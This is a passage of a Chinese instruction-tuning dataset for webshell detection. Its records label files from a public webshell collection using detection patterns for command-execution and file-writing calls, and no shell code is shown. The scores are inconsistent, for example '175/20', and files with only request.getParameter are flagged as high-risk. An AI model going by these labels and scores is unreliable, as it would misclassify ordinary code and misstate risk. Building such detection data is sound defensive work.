"分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"dy.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"74116 bytes\", \"行数\": 1811}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 发现混淆技术: ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 175/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/dy.jsp", "malicious_score": 175, "md5_hash": "e9b952b03a6dda1475a2312a5ed9b747"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"luci.jsp.spy2009.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"84405 bytes\", \"行数\": 2317}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 315/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/luci.jsp.spy2009.jsp", "malicious_score": 315, "md5_hash": "42654af68e5d4ea217e6ece5389eb302"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ha.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"54857 bytes\", \"行数\": 1811}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 发现混淆技术: ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 175/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/ha.jsp", "malicious_score": 175, "md5_hash": "98d861ca2d273ce81c94c86e2546f407"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"x.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"288331 bytes\", \"行数\": 1327}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 96/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/x.jsp", "malicious_score": 96, "md5_hash": "df46c0a60242821aa4f61ed61dbbce73"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ma1.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"53835 bytes\", \"行数\": 1811}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 发现混淆技术: ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 175/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/ma1.jsp", "malicious_score": 175, "md5_hash": "e1afc17af43733629dc562c8462024fa"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"t00ls.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"135710 bytes\", \"行数\": 3294}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 462/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/t00ls.jsp", "malicious_score": 462, "md5_hash": "9c94637f76e68487fa33f7b0030dd932"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"index_sys.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"8439 bytes\", \"行数\": 117}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 23/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/index_sys.jsp", "malicious_score": 23, "md5_hash": "c0c6f940de47c5955e842cfa2984802c"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"SJavaWebManageV1.4.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"52677 bytes\", \"行数\": 1754}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/SJavaWebManageV1.4.jsp", "malicious_score": 13, "md5_hash": "cc155b8cd261a6ed33f264e710ce300e"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"suiyue.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"29907 bytes\", \"行数\": 993}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/suiyue.jsp", "malicious_score": 37, "md5_hash": "727710a7c88ebd82e394bf0293b29730"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"webshell-nc.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"41488 bytes\", \"行数\": 1321}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 52/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/webshell-nc.jsp", "malicious_score": 52, "md5_hash": "598eef7544935cf2139d1eada4375bb5"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"k81.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"716 bytes\", \"行数\": 28}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/k81.jsp", "malicious_score": 9, "md5_hash": "41efc5c71b6885add9c1d516371bd6af"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"102.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"824 bytes\", \"行数\": 31}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/102.jsp", "malicious_score": 15, "md5_hash": "c500cdc7ba1c9a3e26a5eab265ad48e1"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmdjsp.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"681 bytes\", \"行数\": 31}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/cmdjsp.jsp", "malicious_score": 9, "md5_hash": "1b5ae3649f03784e2a5073fa4d160c8b"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"css.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"84500 bytes\", \"行数\": 2324}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 315/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/css.jsp", "malicious_score": 315, "md5_hash": "fc44f6b4387a2cb50e1a63c66a8cb81c"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"3.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"72323 bytes\", \"行数\": 1913}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 184/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/3.jsp", "malicious_score": 184, "md5_hash": "fb8c6c3a69b93e5e7193036fd31a958d"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"in.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"28853 bytes\", \"行数\": 982}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/in.jsp", "malicious_score": 37, "md5_hash": "ffb4ddde520f78481706510db4ab55ab"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspSpy.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"85019 bytes\", \"行数\": 2339}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 324/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/jspspy/JspSpy.jsp", "malicious_score": 324, "md5_hash": "2434a7a07cb47ce25b41d30bc291cacc"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspSpyJDK5.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"84519 bytes\", \"行数\": 2328}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 315/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/jspspy/JspSpyJDK5.jsp", "malicious_score": 315, "md5_hash": "7a4b090619ecce6f7bd838fe5c58554b"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspSpyJDK51.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"84513 bytes\", \"行数\": 2323}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 315/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/jspspy/JspSpyJDK51.jsp", "malicious_score": 315, "md5_hash": "29aebe333d6332f0ebc2258def94d57e"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Jspspyweb.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"42109 bytes\", \"行数\": 1067}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 121/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/jspspy/Jspspyweb.jsp", "malicious_score": 121, "md5_hash": "f865fe7eca826f89a7f4b14ac4fc87e4"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspSpy1.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"85024 bytes\", \"行数\": 2344}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 324/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/jspspy/JspSpy1.jsp", "malicious_score": 324, "md5_hash": "d71716df5042880ef84427acee8b121e"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"1.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"85012 bytes\", \"行数\": 2344}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 324/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/jspbrowser/1.jsp", "malicious_score": 324, "md5_hash": "66babb369c3c9dd3a7b02e9acbf1e210"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Browser.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"73483 bytes\", \"行数\": 1934}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 184/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/jspbrowser/Browser.jsp", "malicious_score": 184, "md5_hash": "a7e25b8ac605753ed0c438db93f6c498"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"55431 bytes\", \"行数\": 1778}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 发现混淆技术: ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 175/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/jspbrowser/2.jsp", "malicious_score": 175, "md5_hash": "5b50da3be91aed89f167b27108adf5d8"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmd2.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"364 bytes\", \"行数\": 12}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/cat/cmd2.jsp", "malicious_score": 12, "md5_hash": "d0831c859163deb1d5e14089eadea0d7"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmd1.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"58 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/cat/cmd1.jsp", "malicious_score": 9, "md5_hash": "657a3d3a22a5cc5bb32c13cc01bbf8d2"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"test.php\", \"文件类型\": \"php\", \"文件大小\": \"1585 bytes\", \"行数\": 37}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_POST[, file_get_contents( 具备文件操作能力: file_put_contents 恶意度评分: 28/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/cat/test.php", "malicious_score": 28, "md5_hash": "80a9d47267697864eb42054f3992deef"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cat.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"9817 bytes\", \"行数\": 282}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 66/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/cat/cat.jsp", "malicious_score": 66, "md5_hash": "3d5b48ae6e77c0de156721774a227412"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"netspy.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"15543 bytes\", \"行数\": 563}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 包含网络功能: HttpURLConnection 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/netspy/netspy.jsp", "malicious_score": 37, "md5_hash": "efc99ac12e9d81480cc7c830a52fa322"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jsp-reverse.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"2357 bytes\", \"行数\": 90}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/JSP/jsp-reverse.jsp", "malicious_score": 12, "md5_hash": "ea87f0c1f0535610becadf5a98aca2fc"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Customize.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"6217 bytes\", \"行数\": 59}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 23/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/JSP/Customize.jsp", "malicious_score": 23, "md5_hash": "8bb7f5a764e51cac59064abc8f93168e"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"minupload.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"2299 bytes\", \"行数\": 48}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/JSP/minupload.jsp", "malicious_score": 9, "md5_hash": "0872edd2560ddfea893f10a58c8b9197"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspWebshell 1.2.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"26075 bytes\", \"行数\": 788}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 86/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/JSP/JspWebshell 1.2.jsp", "malicious_score": 86, "md5_hash": "3ad8871c7e0af131bfb6d354bf229a82"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmdjsp.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"681 bytes\", \"行数\": 31}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/JSP/cmdjsp.jsp", "malicious_score": 9, "md5_hash": "1b5ae3649f03784e2a5073fa4d160c8b"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"download.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"72359 bytes\", \"行数\": 1913}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 184/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/JSP/other/download.jsp", "malicious_score": 184, "md5_hash": "fa87bbd7201021c1aefee6fcc5b8e25a"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jspspy_k8.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"84420 bytes\", \"行数\": 2323}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 315/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/JSP/other/jspspy_k8.jsp", "malicious_score": 315, "md5_hash": "71097537a91fac6b01f46f66ee2d7749"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jspspy.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"84543 bytes\", \"行数\": 2329}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 315/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/JSP/other/jspspy.jsp", "malicious_score": 315, "md5_hash": "ab77e4d1006259d7cbc15884416ca88c"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"thx.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"6217 bytes\", \"行数\": 59}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 23/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/JSP/other/thx.jsp", "malicious_score": 23, "md5_hash": "794e656491eddf9694975adcd2915ec0"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jsp-reverse.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"2357 bytes\", \"行数\": 90}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/JSP_66/jsp-reverse.jsp", "malicious_score": 12, "md5_hash": "ea87f0c1f0535610becadf5a98aca2fc"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Customize.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"6217 bytes\", \"行数\": 59}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 23/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/JSP_66/Customize.jsp", "malicious_score": 23, "md5_hash": "8bb7f5a764e51cac59064abc8f93168e"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"minupload.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"2299 bytes\", \"行数\": 48}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/JSP_66/minupload.jsp", "malicious_score": 9, "md5_hash": "0872edd2560ddfea893f10a58c8b9197"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspWebshell 1.2.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"26075 bytes\", \"行数\": 788}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 86/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/JSP_66/JspWebshell 1.2.jsp", "malicious_score": 86, "md5_hash": "3ad8871c7e0af131bfb6d354bf229a82"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmdjsp.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"681 bytes\", \"行数\": 31}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hackk8/JSP_66/cmdjsp.jsp", "malicious_score": 9, "md5_hash": "1b5ae3649f03784e2a5073fa4d160c8b"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"download.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"72359 bytes\", \"行数\": 1913}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 184/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": 